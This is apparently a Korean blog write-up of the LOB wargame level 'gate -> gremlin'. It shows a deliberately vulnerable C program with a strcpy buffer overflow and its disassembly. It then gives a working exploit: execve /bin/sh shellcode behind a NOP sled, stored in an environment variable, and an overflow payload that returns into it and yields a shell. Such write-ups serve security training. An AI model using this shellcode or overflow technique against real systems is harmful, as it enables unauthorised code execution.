Wargame & CTF/LOB

[LOB] gate -> gremlin

cg10036 2019. 7. 28. 21:42


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
    The Lord of the BOF : The Fellowship of the BOF 
    - gremlin
    - simple BOF
*/
 
int main(int argc, char *argv[])
{
    char buffer[256];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
 
cs


일반적인 버퍼오버플로우 문제이다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
0x8048430 <main>:    push   %ebp
0x8048431 <main+1>:    mov    %ebp,%esp
0x8048433 <main+3>:    sub    %esp,0x100
0x8048439 <main+9>:    cmp    DWORD PTR [%ebp+8],1
0x804843d <main+13>:    jg     0x8048456 <main+38>
0x804843f <main+15>:    push   0x80484e0
0x8048444 <main+20>:    call   0x8048350 <printf>
0x8048449 <main+25>:    add    %esp,4
0x804844c <main+28>:    push   0
0x804844e <main+30>:    call   0x8048360 <exit>
0x8048453 <main+35>:    add    %esp,4
0x8048456 <main+38>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048459 <main+41>:    add    %eax,4
0x804845c <main+44>:    mov    %edx,DWORD PTR [%eax]
0x804845e <main+46>:    push   %edx
0x804845f <main+47>:    lea    %eax,[%ebp-256] // buffer
0x8048465 <main+53>:    push   %eax
0x8048466 <main+54>:    call   0x8048370 <strcpy>
0x804846b <main+59>:    add    %esp,8
0x804846e <main+62>:    lea    %eax,[%ebp-256]
0x8048474 <main+68>:    push   %eax
0x8048475 <main+69>:    push   0x80484ec
0x804847a <main+74>:    call   0x8048350 <printf>
0x804847f <main+79>:    add    %esp,8
0x8048482 <main+82>:    leave  
0x8048483 <main+83>:    ret    
cs


buffer의 크기는 256이다. LOB는 더미가 붙지 않는다.

[BUFFER(256)][SFP(4)][RET(4)] 이므로 "A"*260+&SHELL 하면 쉘을 딸 수 있을것이다.


에그쉘을 써서 문제를 풀어보자.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
[gate@localhost]$ vi getegg.c
[gate@localhost]$ cat getegg.c
#include <stdio.h>
#include <stdlib.h>
 
int main()
{
    printf("%p\n", getenv("EGG"));
}
[gate@localhost]$ gcc getegg.c -o getegg
[gate@localhost]$ export EGG=`python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[gate@localhost]$ ./getegg
0xbffffaa1
 
cs


앞에 놉을 1000개 주고 쉘을 export 했다. EGG의 주소는 0xbffffaa1이다


1
2
3
4
5
[gate@localhost gate]$ ./gremlin `python -c 'print "A"*260+"\xa1\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¡
bash$ my-pass
euid = 501
hello bof world
cs


gremlin : hello bof world

저작자표시 (새창열림)